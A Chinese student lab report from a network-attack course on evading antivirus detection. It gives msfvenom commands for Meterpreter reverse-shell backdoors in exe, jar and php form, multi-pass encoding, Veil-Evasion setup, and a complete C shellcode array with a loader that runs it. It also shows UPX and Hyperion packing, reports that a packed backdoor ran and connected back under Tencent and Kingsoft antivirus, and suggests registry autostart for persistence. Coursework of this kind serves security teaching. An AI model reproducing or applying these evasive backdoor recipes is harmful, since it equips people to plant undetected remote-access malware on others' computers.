2018-2019-2 网络对抗技术 20165303 Exp3 免杀原理与实践

实验内容

• 一. 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）

  - 1.使用msf编码器生成各种后门程序及检测
  - 2.使用veil-evasion生成后门程序及检测
  - 3.半手工注入Shellcode并执行
  

• 二. 通过组合应用各种技术实现恶意代码免杀(0.5分)

（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

• 三.1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

基础问题回答及免杀的原理

• 一.免杀原理

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。

• 二.杀软是如何检测出恶意代码的？

• 1.基于特征码的检测
  简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。
  AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。

• 2.启发式恶意软件检测
  启发式Heuristic，简单来说，就是根据些片面特征去推断。通常是因为缺乏精确判定依据。

• 3.基于行为的恶意软件检测
  最开始提出启发式时，一般也是针对特征扫描的而言的，指通用的、多特征的、非精确的扫描，
  所以后来又提出了基于行为的。从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

• 三.免杀是做什么？

我认为免杀就是使用一定的伪装把自己的程序进行改头换面从而达到不被杀软发现的目的，从而实现恶意软件能够长期存在于系统中，实现自己的恶意功能

• 四.免杀的基本方法有哪些？

• 改变特征码
  - 如果你手里只有EXE
  - 加壳：压缩壳 加密壳

• 有shellcode(像Meterpreter）
  - 用encode进行编码
  - 基于payload重新编译生成可执行文件

• 有源代码
  - 用其他语言进行重写再编译（veil-evasion）

• 改变行为
  - 通讯方式
  - 尽量使用反弹式连接
  - 使用隧道技术
  - 加密通讯数据

• 操作模式
  - 基于内存操作
  - 减少对系统的修改
  - 加入混淆作用的正常功能代码

• 非常规方法
  - 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
  - 使用社工类攻击，诱骗目标关闭AV软件。
  - 纯手工打造一个恶意软件

• 五.如何检测自己的软件
  可以利用老师给的网站VirusTotal或Virscan来看看自己的软件是否能被杀毒引擎检测出来

• 六开启杀软能绝对防止电脑中恶意代码吗？
  从实验来看，开启杀软并不能完全阻止电脑中的恶意代码，只能是能对一些恶意软件起到防护作用，但是一旦伪装的比较好，那就不能被发现了，所以我们今后在学习生活中如果下载什么软件或者外挂游戏什么的，还是要加倍小心，因为杀软并不能完全保证你的安全

实验内容

实验一正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

任务一使用msf编码器生成各种后门程序及检测

1. 正确使用msf编码器，生成exe文件

• 我们首先对实验二生成的backdoor后门程序放到网站VirusTotal或Virscan进行检测一下，软件名字里有数字然后就不能上传很难受，还得改一下名字，下面是检测的结果
  

• 发现这是一个非常明显的后门软件，被很多杀毒引擎都查出来了

• 然后我们使用msf编码器对后门程序进行一次到多次的编码，并进行检测
  一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'x00'不出现在shellcode中，因为shellcode以'x00'为结束符
  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.1.154 LPORT=5303 -f exe > 20165303_backdoor.exe

• 编码完之后进行检测，下面是检测结果，发现并没有什么用处，一次编码的效果微乎其微
  
  

• 十次编码使用命令：-i设置迭代次数
  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.1.154 LPORT=5303 -f exe > wy_backdoor.exe
  

• 接下来进行检测，下面是检测的结果
  
  

• 编码十次也没有什么大的用处，因为你编码总需要解码，杀软只需要把解码的程序代码编入检测库中就可以了，除非你用的新的编码模式，还有就是msfvenom生成backdoor的模板是固定的，只有用新的模板也许可以不被发现

2.利用msfvenom生成jar文件

• 生成java后门程序的命令
  msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 x> wy1_backdoor_java.jar
  
• 下面是扫描的结果

一个软件引擎还是有很多发现是木马程序的，但另一个引擎发现的比较少，只有几个发现是java木马程序，说明java后门程序还是稍微有点作用的

3.msfvenom生成php文件
生成php后门程序的命令如下
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 x> wy_backdoor.php

下面来测试一下生成的结果


发现能被杀毒引擎查出来的已经很少了

任务二使用veil-evasion生成后门程序及检测

• 首先安装veil自己在安装的时候花了不少的功夫，首先宿舍网下载不了，太慢了，有时候直接卡死，后来用自己热点下，下载成功了但是install的时候一直出现error，尤其是解压Python什么的时候老是出问题后来看着同学安装时候的博客，最后终于成功了

sudo apt-get install veil-evasion

• 这是命令，然后进入veil安装，安装好之后会出现如下结果
  

• 然后输入use evasion命令进入Evil-Evasion
  

• 在输入命令use c/meterpreter/rev_tcp.py进入配置界面
  

• 然后设置反弹连接IP set LHOST 192.168.1.154

• 在设置一下端口，set LPORT 5303下面是设置好的结果
  

• 在输入generate生成文件，接着输入生成的程序名字veil_c_5303
  

• 丢到查杀引擎上检测一下
  

• 还是有很多的引擎能够查杀出来，有点尴尬哈，一顿操作猛如虎，结果······

任务三半手工注入Shellcode并执行

• 首先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 -f c这是用C语言生成一段shellcode

在桌面上创建一个.c文件直接丢到codeblocks里加上头文件编译一下直接就可以运行

#include<stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x01x9a"
"x68x02x00x14xb7x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 然后发现一运行就被可恶的腾讯电脑管家给杀掉了，意料之中的事情
  
• 丢到杀毒引擎上看一下，发现还是很容易就被查杀出来了

实验二通过组合应用各种技术实现恶意代码免杀

任务一半手工制作shellcode加压缩壳

• 首先使用压缩壳可以减少应用体积，如ASPack,UPX
  把之前的20165303wy.exe丢到kali中使用命令upx 20165303wy.exe -o wybc_upxed.exe加一个压缩壳

• 然后放到Windows进行运行，发现竟然奇迹般的成功了运用杀毒软件检测发现也没有问题
  

• 这是在杀软开着的情况下运行右下角可以看到杀软开启，并且运行成功，而且也成功回连并获得权限，没有报错
  

• 丢到查杀引擎上看一下，发现还是有很多被查出来了
  

• 完美

任务二加密壳

• 使用加密壳版权保护，反跟踪。如ASProtect,Armadillo

• 将上一个文件拷贝到/usr/share/windows-binaries/hyperion/中

• 进入目录并输入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe
  成功后如下
  
  
  

• 用杀毒软件检查一下发现没有问题
  

• 尝试回连并发现可以成功
  
  丢到杀毒引擎上看一下发现还是有很多被查出来了
  

实验三用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

• 用的同学的win10主机，杀毒软件名称金山毒霸，版本如下
  

• 程序与金山毒霸共存截图
  

• 成功回连结果
  

离实战还缺些什么技术或步骤？

• 我们现在的能做到的免杀还是比较简单的，更多的好的方法还是值得我们去深入研究一下的，病毒库在不断地更新，我们的所学的知识也需要不断更新才行，通过各种组合可以达到很好的效果，可以进行多种尝试
• 在把程序传给其他主机之后，如何能不被杀软发现而且自动运行起来也是一个问题，可以尝试修改注册表和开机自启动来达到目的

实验中遇到的问题

• 首先我发现在刚用压缩壳生成程序后，腾讯电脑管家进行杀毒并不能杀出来，第一次运行的时候也没问题，但是过一会再去运行的时候就会发现被查杀出来了，我想的是这个程序在一开始的时候通过伪装把腾讯电脑管家给骗过去了，但是在运行一段时间之后，就会被电脑管家的行为检测程序给检测出来他是一个后门软件，随之他就会被杀毒软件杀掉，在运行就不行了
• 还有就是不同的杀毒软件的查杀能力也是不同的，你像腾讯电脑管家或者360国内做的比较好的杀毒软件，基本上压缩壳和加密壳都是不太好使的，你需要更高端的技术，但是你像比较低级的软件，你这个程序就不会被查出来

实验总结与体会

通过本次实验呢，我们充分了解了免杀的原理，就是利用各种伪装来达到不被杀毒软件发现的目的，常用的方法有改变特征码之类，压缩壳加密壳是很常见的方法，veil是个强大的工具，尽管在实验中会遇到各种各样的问题，但是通过自己的操作能骗过杀软的那种成就感还是很爽的，可以自豪的说一声辣鸡腾讯辣鸡360，哈哈哈感谢老师给了这么详细的讲解与教程，让我的网络攻防技术又提升了一个台阶，这次实验也给我们提了个醒，今后在电脑中安装杀软后，在下载软件游戏外挂什么的时候还是要非常小心，因为杀软并不能完全保证电脑的安全，很多病毒他是杀不出来的。